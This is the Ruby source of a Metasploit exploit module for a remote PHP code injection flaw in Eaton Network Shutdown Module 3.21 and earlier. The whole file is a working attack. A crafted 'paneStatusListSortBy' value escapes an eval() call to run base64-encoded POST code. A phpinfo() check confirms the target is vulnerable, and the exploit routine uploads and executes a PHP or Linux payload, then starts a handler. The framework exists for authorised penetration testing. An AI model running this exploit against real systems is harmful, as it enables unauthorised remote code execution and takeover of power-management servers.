metasploit-gs/modules/exploits/multi/http/eaton_nsm_code_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Network Shutdown Module (sort_values) Remote PHP Code Injection',
        'Description' => %q{
          This module exploits a vulnerability in Eaton Network Shutdown Module
          version <= 3.21, in lib/dbtools.inc which uses unsanitized user input
          inside a eval() call. Additionally the base64 encoded user credentials
          are extracted from the database of the application. Please note that
          in order to be able to steal credentials, the vulnerable service must
          have at least one USV module (an entry in the "nodes" table in
          mgedb.db)
        },
        'Author' => [
          'h0ng10', # original discovery, msf module
          'sinn3r' # PhpEXE shizzle
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['OSVDB', '83199'],
          ['URL', 'http://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
        ],
        'Payload' => {
          'DisableNops' => true,
          'Space' => 4000
        },

        'Targets' => [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'DefaultTarget' => 0,
        'Privileged' => true,
        'DisclosureDate' => '2012-06-26',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(4679)
      ]
    )
  end

  def check
    # we use a call to phpinfo() for verification
    res = execute_php_code('phpinfo();die();')

    if !res or res.code != 200
      vprint_error('Failed: Error requesting page')
      return CheckCode::Unknown('An error occurred while checking the target')
    end

    return CheckCode::Vulnerable('The target is vulnerable') if (res.body =~ /This program makes use of the Zend/)

    return CheckCode::Safe('The target is not vulnerable')
  end

  def execute_php_code(code, _opts = {})
    param_name = rand_text_alpha(6)
    padding = rand_text_alpha(6)
    url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    send_request_cgi(
      {
        'uri' => '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
            'paneStatusListSortBy' => url_param
          },
        'vars_post' =>
          {
            param_name => Rex::Text.encode_base64(code)
          },
        'headers' =>
          {
            'Connection' => 'Close'
          }
      }
    )
  end

  def no_php_tags(p)
    p = p.gsub(/^<\?php /, '')
    p.gsub(/ \?>$/, '')
  end

  def exploit
    print_status("#{rhost}:#{rport} - Sending payload")

    unlink = (target['Platform'] == 'linux') ? true : false
    p = no_php_tags(get_write_exec_payload(unlink_self: unlink))

    execute_php_code(p)
    handler
  end
end